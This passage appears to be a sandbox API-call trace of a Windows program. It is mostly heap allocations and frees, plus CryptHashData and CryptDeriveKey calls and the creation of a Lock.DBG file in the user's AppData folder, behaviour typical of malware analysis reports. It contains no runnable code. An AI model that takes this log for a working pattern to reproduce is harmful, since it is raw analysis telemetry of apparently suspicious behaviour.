(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0157.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2aaacc0 [0157.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaacc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0157.087] CryptHashData (hHash=0x9e1ab8, pbData=0x2a72648, dwDataLen=0x3, dwFlags=0x1) returned 1 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0157.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0157.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0157.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0157.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.088] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.088] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.088] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.088] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.088] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.088] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0157.088] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.088] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0157.088] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.088] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0157.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaac48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0157.089] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9e1ab8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0157.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.089] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.089] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0157.129] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.129] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0157.129] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0157.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0157.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0157.130] CryptDestroyHash (hHash=0x9e1ab8) returned 1 [0157.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.130] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/DBG" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\dbg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0157.131] GetLastError () returned 0x5 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0157.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0157.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.131] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.DBG" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.dbg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0157.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0157.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.134] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0157.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0157.134] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0157.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 